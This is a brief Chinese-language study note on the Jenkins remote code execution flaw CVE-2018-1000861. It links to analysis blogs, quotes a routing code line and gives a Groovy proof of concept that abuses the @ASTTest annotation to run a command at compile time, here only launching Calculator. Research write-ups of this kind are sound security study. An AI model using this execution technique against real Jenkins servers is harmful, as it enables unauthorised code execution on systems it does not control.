Jenkins的CVE-2018-1000861学习

参考：
https://www.lucifaer.com/2019/03/04/Jenkins RCE分析（CVE-2018-1000861分析）/
https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
https://devco.re/blog/2019/02/19/hacking-Jenkins-part2-abusing-meta-programming-for-unauthenticated-RCE/

// 这句将req中的字符串转换成Jenkins自己规范的路由
// 比如这里将/jenkins_2_150_3/securityRealm/admin/test/转换成/securityRealm/admin/test/
String servletPath = getServletPath(req); 

先在终端设置一下classpath：

export CLASSPATH="/Applications/tomcat-8.0.38/webapps/jenkins-2.150.3/WEB-INF/lib/"

然后执行poc.groovy。Groovy环境安装参考：https://blog.csdn.net/caiqiiqi/article/details/90450023

import groovy.transform.ASTTest


@ASTTest(value={
    assert java.lang.Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator")
})

class Main {
	static void main(args){
	}
}